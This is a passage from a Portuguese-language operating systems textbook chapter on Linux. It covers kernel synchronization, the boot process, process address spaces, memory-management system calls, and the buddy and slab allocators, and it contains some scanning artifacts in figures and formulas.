uma série de locais. Resumiremos brevemente em segui- 
da as construções de sincronização disponíveis no Linux. 

Os primeiros núcleos de Linux tinham apenas uma 
grande trava de núcleo (big kernel lock). Isso provou- 
-se altamente ineficiente, em particular em plataformas 
de multiprocessadores, já que ela impedia que processos 
em CPUs diferentes executassem o código do núcleo 
concorrentemente. Daí que muitos pontos de sincroni- 
zação novos foram introduzidos com uma granularida- 
de muito mais fina. 

O Linux fornece vários tipos de variáveis de sin- 
cronização, usadas internamente no núcleo e disponi- 
veis para aplicações no nível do usuário e bibliotecas. 
No nível mais baixo, o Linux fornece embalagens em 
torno de instruções atômicas suportadas por hardware 
mediante operações como atomic set e atomic read. 
Além disso, como os hardwares modernos reordenam 
as operações de memória, o Linux fornece barreiras de 
memória. Usar operações como rmb e wmb garante que 
todas as operações de memória de leitura/escrita prece- 
dendo a chamada de barreira tenham completado antes 
que quaisquer acessos subsequentes ocorram. 

As construções de sincronização mais usadas são as 
de nível mais alto. Threads que não gostariam de blo- 
quear (por razões de desempenho ou correção) usam 
travas giratórias e travas de leitura/escrita giratórias. A 
versão do Linux atual implementa a chamada trava gira- 
tória “baseada em ticket”, que tem um excelente desem- 
penho em SMP e sistemas multinúcleos. Threads que 
podem ou precisam bloquear usam construções como 
mutexes e semáforos. O Linux dá suporte a chamadas 
não bloqueantes como mutex trylock e sem trywait 
para determinar o status da variável de sincronização 
sem bloquear. Outros tipos de variáveis de sincroni- 
zação, como futexes, completions, travas “ler-copiar- 
-atualizar” (Read-Copy-Update — RCU) etc., também 
têm suporte. Por fim, a sincronização entre o núcleo e o 
código executado por rotinas tratadoras de interrupções 
também pode ser alcançada desabilitando e habilitando 
dinamicamente as interrupções correspondentes. 


10.3.5 Inicializando o Linux 


Detalhes variam de plataforma para plataforma, mas 
em geral os passos a seguir representam o processo de 
inicialização. Quando o computador inicializa, o BIOS 
executa um autoteste POST (Power-On-Self-Test) e faz 
a detecção inicial e inicialização dos dispositivos, tendo 
em vista que o processo de inicialização do SO pode 
basear-se no acesso a discos, monitores, teclados e as- 
sim por diante. Em seguida, o primeiro setor do disco de 
inicialização, o MBR (Master Boot Record — regis- 
tro-mestre de inicialização), é lido em um local de me- 
mória fixa e executado. Esse setor contém um programa 
pequeno (512 bytes) que carrega um programa indepen- 
dente chamado boot do dispositivo de boot, como um 
disco SATA ou SCSI. O programa boot primeiro copia a 
si mesmo para um endereço de memória alta fixo a fim 
de liberar a memória baixa para o sistema operacional. 

Uma vez movido, o boot lê o diretório-raiz do dis- 
positivo de inicialização. Para fazer isso, ele deve com- 
preender o sistema de arquivos e o formato do diretório, 
que é o caso com alguns carregadores de inicialização 
como o GRUB (GRand Unified Bootloader — Gran- 
de carregador de inicializador unificado). Outros car- 
regadores de inicializador populares, como o LILO, da 
Intel, não se baseiam em nenhum sistema de arquivos 
específico. Em vez disso, eles precisam de um mapa de 
bloco e endereços de baixo nível, que descrevem seto- 
res físicos, cabeçotes e cilindros, para encontrar os seto- 
res relevantes a serem carregados. 

Então boot lê o núcleo do sistema operacional e salta 
para ele. Nesse ponto, ele terminou o seu trabalho e o 
núcleo está executando. 

O código de inicialização do núcleo é escrito em lin- 
guagem de montagem e é altamente dependente da má- 
quina. Trabalho típico inclui configurar a pilha de núcleo, 
identificar o tipo da CPU, calcular o montante de RAM 
presente, desabilitar interrupções, habilitar a MMU e por 
fim chamar o procedimento main em linguagem C para 
iniciar a parte principal do sistema operacional. 

O código C também tem uma inicialização conside- 
rável a fazer, mas isso é mais lógico do que físico. Ele 
começa alocando um buffer de mensagem para ajudar 
a depurar problemas de inicialização. À medida que 
a inicialização procede, mensagens são escritas aqui 
sobre o que está acontecendo, de maneira que elas 
possam ser buscadas após uma falha de inicialização 
por um programa de diagnóstico especial. Pense nisso 
como o gravador de voo do sistema operacional (a cai- 
xa preta que os investigadores procuram após a queda 
de um avião). 
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Em seguida as estruturas de núcleo são alocadas. A 
maioria tem tamanho fixo, mas algumas, como a cache 
de página e determinadas estruturas de tabela de página, 
dependem da quantidade de RAM disponível. 

Nesse ponto, o sistema começa a autoconfiguração. 
Ao usar arquivos de configuração dizendo quais tipos de 
dispositivos de E/S podem estar presentes, ele começa 
a sondar os dispositivos para ver quais estão realmen- 
te presentes. Se um dispositivo investigado responder 
à sonda, ele é adicionado a uma tabela de dispositivos 
anexados. Se falhar em responder, presume-se que ele 
está ausente e, assim, é ignorado. Ao contrário das ver- 
sões UNIX tradicionais, drivers do dispositivo Linux 
não precisam ser estaticamente ligados e podem ser car- 
regados dinamicamente (como pode ser feito em todas 
as versões do MS-DOS e Windows, incidentalmente). 

Os argumentos contra e a favor de carregar dinami- 
camente drivers são interessantes e valem a pena ser 
apresentados. O principal argumento a favor do car- 
regamento dinâmico é que um único binário pode ser 
enviado para clientes com configurações divergentes, 
de modo que ele próprio carregue automaticamente os 
drivers de que ele precisa, mesmo sobre uma rede. O 
principal argumento contra o carregamento dinâmico é 
a segurança. Se você está executando um site seguro, 
como um banco de dados de um banco ou um servidor 
da web corporativo, você provavelmente quer tornar 
impossível para qualquer um inserir um código aleató- 
rio no núcleo. O administrador do sistema pode manter 
as fontes do sistema operacional e arquivos do objeto 
em uma máquina segura, fazer todas as construções 
de sistema ali e enviar o binário do núcleo para outras 
máquinas através de uma rede de área local. Se os dri- 
vers não podem ser carregados dinamicamente, esse 
cenário evita que operadores da máquina e outros que 
conhecem a senha de superusuário injetem um código 
malicioso ou com defeitos no núcleo. Além disso, em 
sites grandes, a configuração de hardware é conhecida 
exatamente no momento em que o sistema é compilado 
e ligado. As mudanças são tão raras que ter de religar o 
código do sistema quando um novo dispositivo de hard- 
ware é adicionado não é um problema. 

Uma vez que todo o hardware tenha sido configura- 
do, a próxima coisa a fazer é cuidadosamente alocar o 
processo 0, acertar sua pilha e executá-lo. O processo 0 
continua a inicialização, fazendo coisas como a progra- 
mação do relógio em tempo real, montando o sistema de 
arquivos raiz e criando init (processo 1) e o daemon de 
paginação (processo 2). 

O init confere suas flags para ver se a execução é 
em mono ou multiusuário. No primeiro caso, ele cria 
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um processo que executa o shell e espera pela saída 
desse processo. No segundo caso, ele cria um processo 
e executa o script de shell de inicialização do sistema, 
/etc/rc, que pode fazer as conferências de consistência 
do sistema, montar sistemas de arquivos adicionais, co- 
meçar processos de daemon e assim por diante. Então 
ele lê /etc/ttys, que lista os terminais e algumas de suas 
propriedades. Para cada terminal capacitado, ele cria 
uma cópia de si mesmo, que faz alguma limpeza e ma- 
nutenção e então executa um programa chamado getty. 

Getty estabelece a velocidade da linha e outras pro- 
priedades para cada linha (algumas das quais podem ser 
modems, por exemplo), e então exibe 


login: 


na tela do terminal e tenta ler o nome do usuário do teclado. 
Quando alguém se senta no terminal e fornece um nome 
de login, getty termina executando /bin/login, o programa 
de login. Login então pede a senha, a criptografa e a veri- 
fica com a senha criptografada armazenada no arquivo de 
senhas, /etc/passwd. Se ela estiver correta, login substitui 
a si mesmo com o shell do usuário, que então espera pelo 
primeiro comando. Se estiver incorreto, login pergunta por 
outro nome de usuário. Esse mecanismo é mostrado na Fi- 
gura 10.11 para um sistema com três terminais. 

Na figura, o processo getty executando para o termi- 
nal 0 ainda está esperando pela entrada. No terminal 1, 
um usuário digitou um nome de login, então getty so- 
brescreveu-se com login, que está pedindo a senha. Um 
login bem-sucedido já ocorreu no terminal 2, fazendo 
que o shell digite o prompt (%). O usuário então digitou 


cp f1 f2 


que fez que o shell criasse um processo filho e fizes- 
se esse processo executar o programa cp. O shell está 
bloqueado, esperando que o filho termine, momento em 
que o shell digitará outro prompt e lerá do teclado. Se o 
usuário no terminal 2 tivesse digitado cc em vez de cp, o 
programa principal do compilador C teria sido iniciali- 
zado, o que por sua vez teria criado mais processos para 
executar vários passes do compilador. 


10.4 Gerenciamento de memória no 
Linux 


O modelo de memória do Linux é direto, a fim de 
permitir a portabilidade dos programas e tornar possi- 
vel implementar o Linux em máquinas com unidades 
de gerenciamento de memória amplamente diferentes, 
desde as mais simples (por exemplo, o PC original da 
IBM) a hardwares de paginação sofisticados. Essa é 
uma área de projeto que mudou muito pouco em déca- 
das. Ele funcionou bem, então não precisou de muita 
revisão. Examinaremos agora o modelo e como ele foi 
implementado. 


10.4.1 Conceitos fundamentais 


Todo processo do Linux tem um espaço de endereça- 
mento que logicamente consiste em três segmentos: texto, 
dados e pilha. Um exemplo de espaço de endereçamento 


[FIGURA 10.11] A sequência de processos usados para inicializar sistemas Linux. 
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Daemon de) processo 2 
paginação 


de processo está ilustrado na Figura 10.12(a) como pro- 
cesso 4. O segmento de texto contém as instruções de 
máquina que formam o código executável do programa. 
Ele é produzido pelo compilador e montador traduzindo 
o C, CH, ou outro programa em código de máquina. O 
segmento de texto em geral é somente de leitura. Progra- 
mas que se automodificavam deixaram de interessar em 
1950 mais ou menos, pois eles eram muito difíceis de 
compreender e depurar. Assim, o segmento de texto não 
cresce, encolhe ou muda de qualquer outra maneira. 

O segmento de dados contém armazenamento para 
todas as variáveis, cadeias de caracteres e vetores do pro- 
grama, assim outros dados. Ele tem duas partes, os dados 
inicializados e os não inicializados. Por razões históricas, 
os últimos são conhecidos como BSS (historicamente cha- 
mado Block Started by Symbol). A parte inicializada do 
segmento de dados contém variáveis e constantes do com- 
pilador que precisam de um valor inicial quando o pro- 
grama é inicializado. Todas as variáveis na parte BSS são 
inicializadas para zero após o carregamento. 

Por exemplo, em C é possível declarar uma cadeia de 
caracteres e inicializá-la ao mesmo tempo. Quando o pro- 
grama é inicializado, ele espera que a cadeia tenha o seu 
valor inicial. Para implementar essa construção, o compila- 
dor designa à cadeia um local no espaço de endereçamen- 
to e assegura que, quando o programa é inicializado, esse 
local contenha a cadeia de caracteres adequada. Do ponto 
de vista do sistema operacional, dados inicializados não 
são tão diferentes do texto do programa — ambos contêm 
padrões de bits produzidos pelo compilador que precisam 
ser carregados na memória quando o programa inicializa. 

A existência dos dados não inicializados é na rea- 
lidade apenas uma otimização. Quando uma variável 
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global não é explicitamente inicializada, a semântica da 
linguagem C diz que o seu valor inicial é 0. Na práti- 
ca, a maioria das variáveis globais não é inicializada 
explicitamente e são, portanto, 0. Isso poderia ser im- 
plementado simplesmente tendo uma seção do arquivo 
binário executável idêntica ao número de bytes de da- 
dos, e inicializando todos eles, incluindo aqueles com o 
valor padrão definido como 0. 

No entanto, a fim de poupar espaço no arquivo exe- 
cutável, isso não é feito. Em vez disso, o arquivo contém 
todas as variáveis inicializadas explicitamente seguindo 
o texto de programa. As variáveis não inicializadas são 
reunidas após as inicializadas, de maneira que tudo o 
que o compilador precisa fazer é colocar uma palavra 
no cabeçalho dizendo quantos bytes alocar. 

Para deixar esse ponto mais claro, considere a Figura 
10.12(a) novamente. Aqui o texto de programa tem 8 
KB e os dados inicializados também 8 KB. Os dados 
não inicializados (BSS) têm 4 KB. O arquivo execu- 
tável tem apenas 16 KB (texto + dados inicializados), 
mais um cabeçalho curto que diz ao sistema para alocar 
outros 4 KB após os dados inicializados e zerá-los antes 
de iniciar o programa. Esse truque evita armazenar 4 
KB de zeros no arquivo executável. 

A fim de evitar alocar uma estrutura de página física 
cheia de zeros, durante a inicialização, o Linux aloca 
uma página zero estática, uma página protegida de es- 
crita cheia de zeros. Quando um processo é carregado, a 
sua região de dados não inicializada é configurada para 
apontar para a página zero. Sempre que um processo re- 
almente tenta escrever nessa área, o mecanismo copiar- 
-na-escrita (copy-on-write) é acionado, e uma estrutura 
de página real é alocada para o processo. 


[FIGURA 10.12] (a) Espaço de endereçamento virtual do processo A. (b) Memória física. (c) Espaço de endereçamento virtual do processo B. 
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Ao contrário do segmento de texto, que não pode 
mudar, o segmento de dados pode. Programas modifi- 
cam suas variáveis o tempo inteiro. Além disso, muitos 
programas precisam alocar o espaço dinamicamente du- 
rante a execução. O Linux lida com isso permitindo que 
o segmento de dados cresça e encolha à medida que a 
memória é alocada e liberada. Uma chamada de siste- 
ma, brk, está disponível para permitir que um programa 
estabeleça o tamanho do seu segmento de dados. Assim, 
para alocar mais memória, um programa pode aumen- 
tar o tamanho do seu segmento de dados. O procedi- 
mento de biblioteca C malloc, comumente usado para 
alocar memória, faz um uso intensivo dele. O descritor 
de espaço de endereçamento de processo contém infor- 
mações sobre o alcance das áreas de memória alocadas 
dinamicamente no processo, chamada de heap. 

O terceiro segmento é o de pilha. Na maioria das 
máquinas, ele começa no próximo do topo do espaço 
de endereçamento virtual e cresce para baixo na direção 
de 0. Por exemplo, em plataformas de 32bits x86, a pi- 
lha começa no endereço 0xC0000000, que é o limite do 
endereçamento virtual de 3 GB visível ao processo no 
modo usuário. Se a pilha cresce abaixo da parte de baixo 
do segmento de pilha, uma falta de hardware ocorre e o 
sistema operacional baixa a parte de baixo do segmento 
de pilha por uma página. Programas não gerenciam ex- 
plicitamente o tamanho do segmento de pilha. 

Quando um programa inicializa, a sua pilha não está 
vazia. Em vez disso, ela contém todas as variáveis (shell) 
do ambiente, assim como a linha de comando digitada 
para o shell para invocá-lo. Dessa maneira, um programa 
pode descobrir seus argumentos. Por exemplo, quando 


cp src dest 


é digitado, o programa cp é executado com a cadeia de 
caracteres “cp src dest” na pilha, de maneira que ele 
pode encontrar os nomes dos arquivos fonte e de destino. 
A cadeia de caracteres é representada como um vetor de 
ponteiros para os símbolos na cadeia, a fim de facilitar 
sua análise sintática. 

Quando dois usuários estão executando o mesmo 
programa, como o editor, seria possível, mas ineficien- 
te, manter duas cópias do texto de programa do editor 
na memória ao mesmo tempo. Em vez disso, os siste- 
mas Linux dão suporte a segmentos de texto compar- 
tilhados. Na Figura 10.12(a) e Figura 10.12(c), vemos 
dois processos, 4 e B, que têm o mesmo segmento de 
texto. Na Figura 10.12(b) vemos um layout possível de 
memória física, no qual ambos os processos compar- 
tilham o mesmo fragmento de texto. O mapeamento é 
feito pelo hardware de memória virtual. 


Segmentos de dados e pilhas jamais são comparti- 
lhados exceto após um fork e, então, somente aquelas 
páginas que não são modificadas. Se qualquer um de- 
les precisar crescer e não houver espaço adjacente para 
isso, não há problema, já que as páginas virtuais adja- 
centes não precisam ser mapeadas em páginas físicas 
adjacentes. 

Em alguns computadores, o hardware dá suporte a 
espaços de endereçamento separados para instruções 
e dados. Quando esta característica está disponível, o 
Linux pode usá-la. Por exemplo, em um computador 
com endereços de 32 bits, se essa característica esti- 
ver disponível, haverá 2* bits de espaço de endereça- 
mento para instruções e 2º2 bits adicionais de espaço 
de endereçamento para os segmentos de dados e pilha 
compartilharem. Um salto (jump) ou ramificação para 
0 vai para o endereço 0 do espaço de texto, enquanto 
mover o conteúdo de 0 usa o endereço 0 no espaço de 
dados. Essa característica dobra o espaço de endereça- 
mento possível. 

Além de alocar dinamicamente mais memória, os 
processos no Linux podem acessar dados de arquivos 
através de arquivos mapeados na memória. Essa ca- 
racterística torna possível mapear um arquivo para uma 
porção do espaço de endereçamento do processo, de 
maneira que o arquivo pode ser lido e escrito como se 
ele fosse um vetor de bytes na memória. Mapear um 
arquivo torna o acesso aleatório para ele muito mais 
fácil do que usar chamadas de sistema de E/S como 
read e write. Bibliotecas compartilhadas são acessadas 
mapeando-as usando esse mecanismo. Na Figura 10.13, 
vemos um arquivo que está mapeado em dois processos 
ao mesmo tempo, em diferentes endereços virtuais. 

Uma vantagem adicional de mapear um arquivo é que 
dois ou mais processos podem mapear o mesmo arquivo 
ao mesmo tempo. Escritas para o arquivo por qualquer 
um deles são então instantaneamente visíveis para os ou- 
tros. Na realidade, ao mapear um arquivo de rascunho 
(que será descartado após todos os processos saírem), 
esse mecanismo proporciona um caminho de alta largura 
de banda para múltiplos processos compartilharem me- 
mória. No caso mais extremo, dois (ou mais) processos 
poderiam mapear um arquivo que cobre todo o espaço 
de endereçamento, proporcionando uma forma de com- 
partilhamento que é um meio caminho entre processos 
separados e threads. Aqui o espaço de endereçamento é 
compartilhado (como threads), mas cada processo man- 
tém seus próprios arquivos abertos e sinais, por exem- 
plo, diferentemente dos threads. Na prática, no entanto, 
nunca são criados dois espaços de endereçamento exata- 
mente correspondentes. 
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(FIGURA 10.13] Dois processos podem compartilhar um arquivo, mapeado. 


Processo A 
Ponteiro da pilha ——| 


Arquivo { 
mapeado 


10.4.2 Chamadas de sistema para gerenciamento 
de memoria no Linux 


O POSIX não especifica quaisquer chamadas de sis- 
tema para o gerenciamento de memória. Esse tópico foi 
considerado dependente demais de máquinas para a pa- 
dronização. Em vez disso, o problema foi varrido para 
baixo do tapete dizendo que os programas que precisam 
de gerenciamento de memória dinâmica podem usar o 
procedimento de biblioteca malloc (definido pelo pa- 
drão ANSI C). Como malloc é implementado é tirado, 
desse modo, do escopo do padrão POSIX. Em alguns 
círculos, essa abordagem é considerada uma transferên- 
cia de responsabilidade. 

Na prática, a maioria dos sistemas Linux tem chama- 
das para o gerenciamento de memória. As mais comuns 
estão listadas na Figura 10.14. Brk especifica o tamanho 
do segmento de dados dando o endereço do primeiro 
byte além dele. Se o novo valor for maior do que o an- 
tigo, o segmento de dados torna-se maior; de outra ma- 
neira, ele encolhe. 

As chamadas de sistema mmap e munmap con- 
trolam arquivos mapeados na memória. O primeiro 


Memória física 





Processo B 


Arquivo 
mapeado 


parâmetro para mmap, addr, determina o endereço 
no qual o arquivo (ou porção disso) está mapeado. 
Ele deve ser um múltiplo do tamanho da página. Se 
esse parâmetro for 0, o sistema determina o endereço 
em si e o retorna em a. O segundo parâmetro, len, 
diz quantos bytes mapear. Ele, também, deve ser um 
múltiplo do tamanho da página. O terceiro parâme- 
tro, prot, determina a proteção do arquivo mapeado. 
Ele pode ser marcado como legível, passível de ser 
escrito, executável ou alguma combinação desses. O 
quarto parâmetro, flags, controla se um arquivo é pri- 
vado ou compartilhável, e se addr é uma exigência 
ou meramente uma dica. O quinto parâmetro, fd, é 
o descritor de arquivo para o arquivo a ser mapea- 
do. Apenas arquivos abertos podem ser mapeados, de 
maneira que para mapear um arquivo, ele deve pri- 
meiro ser aberto. Por fim, offset diz onde no arquivo 
deve começar o mapeamento. Não é necessário co- 
meçar o mapeamento no byte 0; qualquer limite de 
página pode ser escolhido. 

A outra chamada, unmap, remove um arquivo ma- 
peado. Se apenas uma porção do arquivo tiver o mapea- 
mento removido, o resto segue mapeado. 


ei TESI Algumas chamadas de sistema relacionadas ao gerenciamento da memória. O código de retorno s é —1 se ocorrer algum 
erro; a e addr são endereços de memória, Jen é um tamanho, prot controla a proteção, flags são bits mistos, fd é um 
descritor de arquivo e offset é um deslocamento de arquivo. 





Chamada de sistema 


Descrição 





s = brk(addr) 


Altera o tamanho do segmento de dados 





a = mmap(adar, len, prot, flags, fd, offset) 


Mapeia um arquivo na memória 





s = unmap(addr, len) 








Remove o mapeamento do arquivo 
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10.4.3 Implementação do gerenciamento de 
memoria no Linux 


Cada processo do Linux em uma maquina de 32 bits 
tipicamente recebe 3 GB de espaço de endereçamento 
virtual para si, com os restantes 1 GB reservados para 
suas tabelas de páginas e outros dados de núcleo. O 1 GB 
do núcleo não é visível quando executa em modo usu- 
ário, mas se torna acessível quando o processo chaveia 
para o núcleo. A memória do núcleo geralmente reside 
na memória física baixa, mas está mapeada no 1 GB de 
cima do espaço de endereçamento virtual de cada pro- 
cesso, entre os endereços 0xC0000000 e OxFFFFFFFF 
(3-4 GB). Nas máquinas x86 de 64 bits atuais, apenas 
até 48 bits são usados para endereços, implicando um 
limite teórico de 256 TB para o tamanho da memória 
endereçável. O Linux divide a sua memória entre o es- 
paço de núcleo e o do usuário, resultando em um máxi- 
mo de 128 TB de espaço de endereçamento virtual por 
processo. O espaço de endereçamento é criado quando 
o processo é criado e é sobrescrito em uma chamada de 
sistema exec. 

A fim de permitir que múltiplos processos compar- 
tilhem a memória física subjacente, o Linux monitora o 
uso da memória física, aloca mais memória conforme a 
necessidade dos processos do usuário ou componentes 
do núcleo, mapeia dinamicamente porções da memória 
física no espaço de endereçamento de diferentes proces- 
sos, e dinamicamente traz para dentro e leva para fora 
da memória executáveis de programa, arquivos e outras 
informações de estado conforme a necessidade, de modo 
a utilizar os recursos da plataforma eficientemente e as- 
segurar o progresso da execução. O restante desta seção 
descreve a implementação de vários mecanismos no nú- 
cleo do Linux que são responsáveis por essas operações. 


Gerenciamento da memória física 


Por causa de limitações de hardware idiossincráticas 
em muitos sistemas, nem toda a memória física pode ser 
tratada identicamente, em especial com relação à E/S e 
memória virtual. O Linux distingue entre as seguintes 
zonas de memória: 


1. ZONE DMA e ZONE DMA32: páginas que 
podem ser usadas para DMA. 

2. ZONE NORMAL: páginas normais, mapeadas 
regularmente. 

3. ZONE HIGHMEM: páginas com endereços 
de memória alta, que não são permanentemente 
mapeados. 


As fronteiras exatas e layout das zonas de memória 
dependem da arquitetura. No hardware x86, determina- 
dos dispositivos podem realizar operações de DMA ape- 
nas nos primeiros 16 MB de espaço de endereçamento, 
daí que ZONE DMA está na faixa de 0-16 MB. Em má- 
quinas de 64 bits, há um suporte adicional para aqueles 
dispositivos que podem realizar operações de DMA de 
32 bits, e ZONE. DMAS32 marca essa região. Além disso, 
se o hardware, como o 1386 de uma geração mais anti- 
ga, não pode mapear endereços de memória diretamen- 
te acima de 896 MB, ZONE. HIGHMEM corresponde a 
qualquer coisa acima dessa marca. ZONE NORMAL é 
qualquer coisa entre eles. Portanto, em plataformas x86 
de 32 bits, os primeiros 896 MB do espaço de ende- 
reçamento Linux são diretamente mapeados, enquanto 
os restantes 128 MB de espaço de endereçamento do 
núcleo são usados para acessar regiões de memória alta. 
Em x86 64, ZONE HIGHMEM não está definido. O 
núcleo mantém uma estrutura zone para cada uma das 
três zonas, e pode realizar alocações de memória para as 
três zonas separadamente. 

A memória principal no Linux consiste em três par- 
tes. Nas duas primeiras, o núcleo e o mapa de memória, 
estão fixas (pinned) na memória (isto é, suas páginas 
jamais são excluídas). O resto da memória está dividido 
em quadros de páginas, e cada um deles pode conter 
uma página de texto, dados, pilha, tabela de páginas ou 
estar em uma lista livre. 

O núcleo mantém um mapa da memória principal 
que contém todas as informações sobre o uso da memó- 
ria física no sistema, como suas zonas, quadros de pági- 
nas livres e assim por diante. A informação, ilustrada na 
Figura 10.15, é organizada como a seguir. 

Em primeiro lugar, o Linux mantém um arranjo de 
descritores de páginas, do tipo page para cada quadro 
de página física no sistema, chamado mem map. Cada 
descritor de página contém um ponteiro para o espaço 
de endereçamento ao qual ele pertence, caso a página 
não esteja livre, um par de ponteiros que permitem a ela 
formar listas duplamente encadeadas com outros descri- 
tores, por exemplo, para manter juntas todos os quadros 
de páginas livres, e alguns outros campos. Na Figura 
10.15 o descritor para a página 150 contém um mapea- 
mento para o espaço de endereçamento ao qual a página 
pertence. As páginas 70, 80 e 200 estão livres, e elas 
estão ligadas juntas. O tamanho do descritor da página 
é 32 bytes, portanto, todo o mem map pode consumir 
menos de 1% da memória física (para um quadro de 
página de 4 KB). 

Como a memória física é dividida em zonas, para 
cada uma o Linux mantém um descritor de zonas. O 


(FIGURA 10.15] Representação da memória principal do Linux. 
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Memória física 



































ZONE_HIGHMEM 





ZONE_NORMAL 





ZONE_DMA 










descritor de zona 





node zones[3] 
node mem map 








node_id 











descritor de nó 


descritor de zonas contém informações sobre a utiliza- 
ção de memória dentro de cada uma, como o número de 
páginas ativas ou inativas, marcações altas e baixas e a 
serem usadas pelo algoritmo de substituição de pági- 
nas descrito posteriormente neste capítulo, assim como 
muitos outros campos. 

Além disso, um descritor de zona contém um arranjo 
de áreas livres. O i-ésimo elemento nesse arranjo iden- 
tifica o primeiro descritor de página do primeiro bloco 
de 2' páginas livres. Como pode haver mais de um blo- 
co de 2 páginas livres, o Linux usa o par de ponteiros 
descritores de páginas em cada elemento de page para 
ligá-los. Essa informação é usada nas operações de alo- 
cação de memória. Na Figura 10.15, free areal0], que 
identifica todas as áreas livres da memória principal 
consistindo de apenas um quadro de página (tendo em 
vista que 2º é um), aponta para a página 70, a primeira 
das três áreas livres. Os outros blocos livres de tamanho 
um podem ser alcançados através de ligações em cada 
um dos descritores de páginas. 

Por fim, como o Linux é portátil para arquiteturas 
NUMA (onde diferentes endereços de memória têm di- 
ferentes tempos de acesso), a fim de distinguir entre a 
memória física em diferentes nodos (e evitar alocar es- 
truturas de dados através deles), é usado um descritor 
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de nodos. Cada descritor de nodos contém informações 
sobre o uso de memória e zonas naquele nodo em par- 
ticular. Em plataformas UMA, o Linux descreve toda a 
memória por meio de um descritor de nodo. Os primei- 
ros bits dentro de cada descritor de página são usados 
para identificar o nodo e a zona à qual o quadro de pá- 
gina pertence. 

A fim de que o mecanismo de paginação seja efi- 
ciente tanto nas arquiteturas de 32 quanto nas de 64 bits, 
o Linux faz uso de um esquema de paginação de quatro 
níveis. Um esquema de paginação de três níveis, origi- 
nalmente colocado no sistema para o Alpha, foi expan- 
dido após o Linux 2.6.10, e já na versão 2.6.11 é usado 
um esquema de paginação de quatro níveis. Cada ende- 
reco virtual é dividido em cinco campos, como mostra- 
do na Figura 10.16. Os campos dos diretórios são usados 
como um índice para o diretório de páginas apropriado, 
do qual há um privado para cada processo. O valor en- 
contrado é um ponteiro para um dos diretórios do nível 
seguinte, que são novamente indexados por um campo 
do endereço virtual. A entrada selecionada no diretório 
da página do meio aponta para a tabela de página fi- 
nal, que é indexada pelo campo de página do endereço 
virtual. A entrada encontrada aqui aponta para a página 
necessária. No Pentium, que usa a paginação de dois 
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KAUTE O Linux usa tabelas de páginas de quatro níveis. 
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níveis, cada diretório superior e do meio da página tem 
apenas uma entrada, então a entrada de diretório global 
efetivamente escolhe a tabela de página a ser usada. De 
modo similar, a paginação de três níveis pode ser usada 
quando necessário, estabelecendo o tamanho do campo 
do diretório de página superior para zero. 

A memória física é usada para várias finalidades. O 
núcleo em si está completamente fixado; nenhuma parte 
dele jamais é paginada para fora. O resto da memória 
está disponível para páginas do usuário, a cache de pa- 
ginação e outras finalidades. A cache da página contém 
páginas com blocos de arquivos que foram recentemen- 
te lidos ou foram lidos antecipadamente na expectativa 
de serem usados em um futuro próximo, ou páginas de 
blocos de arquivos que precisam ser escritas para o dis- 
co, como aquelas que foram criadas a partir de proces- 
sos de modo usuário que foram movidas para o disco. 
Ela é dinâmica em tamanho e compete pelo mesmo con- 
junto de páginas que os processos do usuário. A cache 
de paginação não é realmente uma cache separada, mas 
simplesmente o conjunto de páginas do usuário que não 
são mais necessárias e estão esperando para serem pagi- 
nadas para fora. Se uma página na cache de paginação 
é reutilizada antes de ser expulsa da memória, ela pode 
ser recuperada rapidamente. 

Além disso, o Linux dá suporte a módulos dina- 
micamente carregados, mais comumente drivers de 
dispositivos. Esses podem ser de tamanhos arbitrários 
e cada um deve ser alocado a um fragmento contíguo 
de memória do núcleo. Como uma consequência direta 
dessas exigências, o Linux gerencia a memória física 
de tal maneira que ele pode adquirir um fragmento de 
tamanho arbitrário da memória conforme sua vontade. 
O algoritmo que ele usa é conhecido como o algoritmo 
companheiro (buddy) e é descrito a seguir. 


Mecanismos de alocação de memória 


O Linux da suporte a diversos mecanismos para alo- 
cação da memória. O principal mecanismo para aloca- 
ção de novos quadros de páginas de memória física é 
o alocador de páginas, que opera usando o conhecido 
algoritmo companheiro (buddy algorithm). 

A ideia básica para o gerenciamento de um bloco de 
memória é a seguinte: inicialmente, a memória consiste 
em um único fragmento contíguo, 64 páginas no exem- 
plo simples da Figura 10.17(a). Quando chega uma soli- 
citação para a memória, ela primeiro é arredondada para 
uma potência de 2, digamos oito páginas. O bloco de 
memória inteiro é dividido pela metade, como mostra- 
do em (b). Como cada um desses fragmentos ainda é 
grande demais, o fragmento mais baixo é dividido pela 
metade novamente (c) e novamente (d). Agora temos 
um bloco do tamanho correto, então ele é alocado para 
o chamador, como mostra o sombreado em (d). 

Agora suponha que uma segunda solicitação chegue 
para oito páginas. Isso pode ser satisfeito diretamente 
agora (e). A essa altura uma terceira solicitação chega 
para quatro páginas. O menor bloco disponível é divi- 
dido (f) e metade dele é reivindicada (g). Em seguida, o 
segundo dos blocos de 8 páginas é liberado (h). Por fim, 
o outro bloco de oito páginas é liberado. Tendo em vista 
que dois blocos de oito páginas recém-liberados vieram 
do mesmo bloco de 16 páginas, eles são fundidos para 
conseguir de volta o bloco de 16 paginas (i). 

O Linux gerencia a memória usando o algoritmo 
companheiro, com a característica adicional de ter um 
arranjo no qual o primeiro elemento é o cabeçalho da 
lista de blocos do tamanho de 1 unidade, o segundo 
elemento é o cabeçalho de uma lista de blocos de ta- 
manho de 2 unidades, o elemento seguinte aponta para 


[FIGURA 10.17] 10.17 CASMAN Operação do algoritmo companheiro. 
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blocos de 4 unidades, e assim por diante. Dessa manei- 
ra, qualquer bloco na potência de 2 pode ser encontrado 
rapidamente. 

Esse algoritmo leva a uma fragmentação interna con- 
siderável, pois se você quiser um bloco de 65 páginas, 
você precisa pedir e receber um bloco de 128 páginas. 

A fim de amenizar esse problema, o Linux tem 
uma segunda alocação de memória, o alocador de 
fatias (slabs), que obtém blocos usando o algoritmo 
companheiro, mas então corta fatias (unidades me- 
nores) a partir deles e gerencia as unidades menores 
separadamente. 

Tendo em vista que o núcleo frequentemente cria e 
destrói objetos de um determinado tipo (por exemplo, 
task struct), ele conta com as chamadas caches de ob- 
jetos. Essas caches consistem de ponteiros para uma ou 
mais fatias que podem armazenar uma série de objetos 
do mesmo tipo. Cada uma das fatias pode estar cheia, 
parcialmente cheia ou vazia. 

Por exemplo, quando o núcleo precisa alocar um 
novo descritor de processo, isto é, um novo task struct, 
ele procura na cache por estruturas de tarefas, e primei- 
ro tenta encontrar uma fatia parcialmente cheia e alocar 
o novo objeto task struct ali. Se nenhuma fatia estiver 
disponível, ele procura através de uma lista de fatias va- 
zias. Por fim, se necessário, ele alocará uma nova fatia, 
colocará a nova estrutura de tarefa ali e ligará essa fatia 
com a cache de objetos de estrutura de tarefa. O ser- 
